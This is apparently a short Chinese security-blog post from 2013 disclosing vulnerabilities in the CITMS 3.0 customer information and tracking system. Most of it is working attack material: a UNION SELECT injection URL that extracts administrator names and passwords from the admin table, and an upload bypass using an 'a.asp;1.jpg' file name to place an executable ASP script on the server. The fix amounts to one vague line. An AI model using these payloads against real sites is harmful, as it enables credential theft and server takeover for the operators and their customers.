当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

公司客户信息与追踪管理系统CITMS 3.0 注入及上传漏洞

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

管理系统部分功能如下:
(1)在线增加、修改、删除管理员
(2)在线增加、修改、删除客户记录、支持HTML等..
(3)前台记录有追踪功能..以及追踪记录和点击次数显示

源码下载:

注入:
/citms3.0/list.asp?id=1320 union select 1,name,3,pass,5,6,7,8,9,10,11,12,13,14,15,16 from admin

上传
/soft/demo/citms3.0/upload_pic.asp

上传a.asp;1.jpg 成功后得到:a.asp;随机数.jpg

如: /a.asp;131672.jpg

修复:

加入过滤和上传验证

,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1